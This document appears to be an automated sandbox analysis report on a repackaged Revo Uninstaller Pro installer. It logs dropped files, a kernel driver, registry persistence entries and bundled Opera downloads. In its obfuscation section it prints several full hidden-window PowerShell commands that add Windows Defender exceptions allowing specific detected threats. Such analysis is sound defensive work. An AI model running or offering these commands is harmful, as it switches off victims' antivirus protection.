      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller ProJump to behavior
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic file information: File size 22221229 > 1048576
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PACK.EXE, 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp, PACK.EXE, 00000010.00000003.2196303250.0000000004E01000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2194996794.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000000.2193337281.0000000001002000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb@ source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4852875
      Source: Uninstall.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2d16e
      Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x39be
      Source: ya.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x31f21
      Source: System.dll.26.drStatic PE information: real checksum: 0x0 should be: 0x39be
      Source: INetC.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4238d
      Source: OperaSetup[1].exe.26.drStatic PE information: real checksum: 0x2235ff should be: 0x226a34
      Source: PACK.EXE.0.drStatic PE information: real checksum: 0x184409 should be: 0x72a2e
      Source: OperaSetup.exe.26.drStatic PE information: real checksum: 0x2235ff should be: 0x226a34
      Source: nsExec.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x939f
      Source: LangDLL.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xeae7
      Source: tsjtmfdm[1].pkg.0.drStatic PE information: real checksum: 0x184409 should be: 0x72a2e
      Source: INetC.dll.26.drStatic PE information: real checksum: 0x0 should be: 0x4238d
      Source: nsDialogs.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x11042
      Source: RevoAppBar.exe.0.drStatic PE information: section name: .giats
      Source: RevoUnPro.exe.0.drStatic PE information: section name: .giats
      Source: RevoUninPro.exe.0.drStatic PE information: section name: .giats
      Source: ruplp.exe.0.drStatic PE information: section name: .didata
      Source: Opera_installer_2412091654075368040.dll.28.drStatic PE information: section name: .rodata
      Source: Opera_installer_2412091654075368040.dll.28.drStatic PE information: section name: CPADinfo
      Source: Opera_installer_2412091654075368040.dll.28.drStatic PE information: section name: malloc_h
      Source: Opera_installer_2412091654079011640.dll.29.drStatic PE information: section name: .rodata
      Source: Opera_installer_2412091654079011640.dll.29.drStatic PE information: section name: CPADinfo
      Source: Opera_installer_2412091654079011640.dll.29.drStatic PE information: section name: malloc_h
      Source: Opera_installer_2412091654087472252.dll.30.drStatic PE information: section name: .rodata
      Source: Opera_installer_2412091654087472252.dll.30.drStatic PE information: section name: CPADinfo
      Source: Opera_installer_2412091654087472252.dll.30.drStatic PE information: section name: malloc_h
      Source: Opera_installer_2412091654101308068.dll.31.drStatic PE information: section name: .rodata
      Source: Opera_installer_2412091654101308068.dll.31.drStatic PE information: section name: CPADinfo
      Source: Opera_installer_2412091654101308068.dll.31.drStatic PE information: section name: malloc_h
      Source: Opera_installer_2412091654106048056.dll.32.drStatic PE information: section name: .rodata
      Source: Opera_installer_2412091654106048056.dll.32.drStatic PE information: section name: CPADinfo
      Source: Opera_installer_2412091654106048056.dll.32.drStatic PE information: section name: malloc_h
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE336 push ecx; ret 16_2_00FEE349
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FED870 push eax; ret 16_2_00FED88E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048C42BD push ebx; ret 17_2_048C42DA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048C5EB2 push esp; ret 17_2_048C5EC3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048C6820 push eax; ret 17_2_048C6833
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048C3A98 push ebx; retf 17_2_048C3ADA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_05177711 push eax; ret 21_2_05177723
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_051742A8 push ebx; ret 21_2_051742DA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_051722FD pushad ; ret 21_2_05172301
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_05175EB0 push esp; ret 21_2_05175EC3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_05173A98 push ebx; retf 21_2_05173ADA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_08D4128A push eax; ret 21_2_08D412A3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04675EB0 push esp; ret 23_2_04675EC3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04673AB8 push ebx; retf 23_2_04673ADA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_08272F23 push eax; ret 23_2_08272F33

      Persistence and Installation Behavior

      barindex
      Source: c:\program files\vs revo group\revo uninstaller pro\ruext.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{2c5515dc-2a7e-4bfd-b813-cacc2b685eb7}\inprocserver32
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\Downloads\OperaSetup.exeJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_115.0.5322.77_Autoupdate_x64[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654101308068.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654087472252.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to dropped file
      Source: C:\Users\user\Downloads\OperaSetup.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091154091\opera_packageJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkgJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\PACK.EXEJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OperaSetup[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654075368040.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exeJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsDialogs.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to dropped file
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\drivers\SETB88F.tmpJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsExec.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\INetC.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654079011640.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to dropped file
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\revoflt.sys (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654106048056.dllJump to dropped file
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\drivers\SETB88F.tmpJump to dropped file
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\revoflt.sys (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkgJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091154091\opera_packageJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115408145.log
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115410771.log
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior

      Boot Survival

      barindex
      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\VS Revo Group\Revo Uninstaller Pro\Uninstaller\AllProgs\RegExclude HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\VS Revo Group\Revo Uninstaller Pro\Uninstaller\Traced\RegExclude HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesJump to behavior
      Source: C:\Windows\System32\rundll32.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Revoflt\InstancesJump to behavior
      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
